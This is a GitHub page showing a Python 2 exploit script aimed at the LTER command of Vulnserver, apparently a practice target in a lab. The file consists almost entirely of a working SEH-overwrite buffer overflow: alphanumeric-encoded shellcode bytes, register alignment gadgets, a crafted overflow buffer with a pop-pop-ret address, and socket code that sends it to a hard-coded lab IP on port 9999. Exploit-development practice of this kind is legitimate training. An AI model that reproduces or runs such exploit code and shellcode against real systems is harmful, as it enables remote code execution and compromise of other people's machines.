-
Notifications
You must be signed in to change notification settings - Fork 20
/
vulnserver_lter_seh.py
82 lines (74 loc) · 4.04 KB
/
vulnserver_lter_seh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/usr/bin/python
import socket
import os
import sys
buf = ""
buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x79\x6c\x6b\x58\x4c\x42\x53\x30\x47\x70\x47\x70\x73"
buf += "\x50\x4c\x49\x39\x75\x46\x51\x69\x50\x71\x74\x4c\x4b"
buf += "\x32\x70\x74\x70\x4c\x4b\x66\x32\x46\x6c\x4e\x6b\x33"
buf += "\x62\x45\x44\x6c\x4b\x74\x32\x66\x48\x74\x4f\x68\x37"
buf += "\x43\x7a\x44\x66\x65\x61\x39\x6f\x4c\x6c\x35\x6c\x75"
buf += "\x31\x33\x4c\x75\x52\x54\x6c\x51\x30\x69\x51\x38\x4f"
buf += "\x46\x6d\x56\x61\x39\x57\x5a\x42\x58\x72\x72\x72\x46"
buf += "\x37\x4e\x6b\x76\x32\x42\x30\x6e\x6b\x30\x4a\x57\x4c"
buf += "\x6e\x6b\x72\x6c\x66\x71\x53\x48\x4a\x43\x63\x78\x75"
buf += "\x51\x6e\x31\x62\x71\x4c\x4b\x56\x39\x67\x50\x55\x51"
buf += "\x49\x43\x6e\x6b\x52\x69\x35\x48\x49\x73\x54\x7a\x71"
buf += "\x59\x4e\x6b\x74\x74\x6c\x4b\x46\x61\x6b\x66\x54\x71"
buf += "\x49\x6f\x6c\x6c\x6f\x31\x68\x4f\x34\x4d\x46\x61\x58"
buf += "\x47\x56\x58\x39\x70\x52\x55\x58\x76\x64\x43\x71\x6d"
buf += "\x6a\x58\x77\x4b\x51\x6d\x66\x44\x71\x65\x79\x74\x31"
buf += "\x48\x4e\x6b\x61\x48\x54\x64\x63\x31\x4e\x33\x33\x56"
buf += "\x6e\x6b\x66\x6c\x52\x6b\x6c\x4b\x71\x48\x35\x4c\x47"
buf += "\x71\x6a\x73\x4c\x4b\x35\x54\x4c\x4b\x37\x71\x7a\x70"
buf += "\x4b\x39\x43\x74\x64\x64\x57\x54\x33\x6b\x71\x4b\x51"
buf += "\x71\x62\x79\x52\x7a\x46\x31\x4b\x4f\x4b\x50\x51\x4f"
buf += "\x73\x6f\x51\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x61"
buf += "\x4d\x71\x78\x46\x53\x35\x62\x37\x70\x35\x50\x30\x68"
buf += "\x50\x77\x73\x43\x76\x52\x63\x6f\x46\x34\x42\x48\x42"
buf += "\x6c\x32\x57\x71\x36\x47\x77\x6b\x4f\x79\x45\x58\x38"
buf += "\x4e\x70\x55\x51\x63\x30\x53\x30\x77\x59\x4a\x64\x71"
buf += "\x44\x56\x30\x43\x58\x65\x79\x6d\x50\x42\x4b\x55\x50"
buf += "\x39\x6f\x4a\x75\x76\x30\x76\x30\x30\x50\x50\x50\x63"
buf += "\x70\x62\x70\x33\x70\x50\x50\x75\x38\x49\x7a\x76\x6f"
buf += "\x4b\x6f\x4b\x50\x49\x6f\x78\x55\x4e\x77\x61\x7a\x34"
buf += "\x45\x31\x78\x4f\x30\x4f\x58\x69\x4e\x4c\x45\x52\x48"
buf += "\x33\x32\x35\x50\x77\x61\x33\x6c\x4c\x49\x7a\x46\x71"
buf += "\x7a\x76\x70\x66\x36\x52\x77\x63\x58\x6a\x39\x4e\x45"
buf += "\x31\x64\x51\x71\x49\x6f\x79\x45\x6c\x45\x79\x50\x34"
buf += "\x34\x54\x4c\x79\x6f\x30\x4e\x64\x48\x51\x65\x58\x6c"
buf += "\x32\x48\x6a\x50\x4c\x75\x6e\x42\x50\x56\x79\x6f\x59"
buf += "\x45\x75\x38\x53\x53\x42\x4d\x72\x44\x37\x70\x6b\x39"
buf += "\x4d\x33\x62\x77\x32\x77\x33\x67\x56\x51\x39\x66\x73"
buf += "\x5a\x42\x32\x73\x69\x71\x46\x68\x62\x49\x6d\x71\x76"
buf += "\x6a\x67\x57\x34\x45\x74\x67\x4c\x47\x71\x45\x51\x4e"
buf += "\x6d\x37\x34\x46\x44\x66\x70\x79\x56\x57\x70\x47\x34"
buf += "\x53\x64\x36\x30\x76\x36\x70\x56\x46\x36\x42\x66\x36"
buf += "\x36\x32\x6e\x53\x66\x46\x36\x31\x43\x66\x36\x53\x58"
buf += "\x70\x79\x68\x4c\x77\x4f\x4e\x66\x39\x6f\x7a\x75\x6f"
buf += "\x79\x39\x70\x32\x6e\x73\x66\x33\x76\x6b\x4f\x74\x70"
buf += "\x61\x78\x44\x48\x4d\x57\x37\x6d\x61\x70\x59\x6f\x79"
buf += "\x45\x4f\x4b\x58\x70\x4f\x45\x69\x32\x56\x36\x55\x38"
buf += "\x59\x36\x4d\x45\x6f\x4d\x4f\x6d\x59\x6f\x69\x45\x35"
buf += "\x6c\x35\x56\x53\x4c\x76\x6a\x6f\x70\x39\x6b\x79\x70"
buf += "\x61\x65\x67\x75\x6d\x6b\x77\x37\x62\x33\x30\x72\x32"
buf += "\x4f\x51\x7a\x47\x70\x73\x63\x6b\x4f\x49\x45\x41\x41"
align_esp = "\x5b\x5f\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
align_ebx = zero_eax + "\x2D\x55\x55\x55\x5E\x2D\x55\x55\x55\x5E\x2D\x56\x55\x56\x5F" + "\x50"
align_ebx += zero_eax + "\x2D\x2A\x69\x5C\x54\x2D\x2A\x69\x5C\x54\x2D\x2B\x6A\x5C\x54" + "\x50"
magic = align_esp + align_ebx
print "magic length = " + str(len(magic))
buffer = "." + buf + "A" * (3518 - 126 - len(buf)) + magic + "\x46" * (126 - len(magic)) + "\x73\xffBB" + "\x2b\x17\x50\x62" + "D" * (5000 - 3522 - 4)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.222.129", 9999))
print expl.recv(1024)
expl.send("LTER " + buffer + "\r\n")
print expl.recv(1024)
expl.send('EXIT\r\n')
expl.close()
print buffer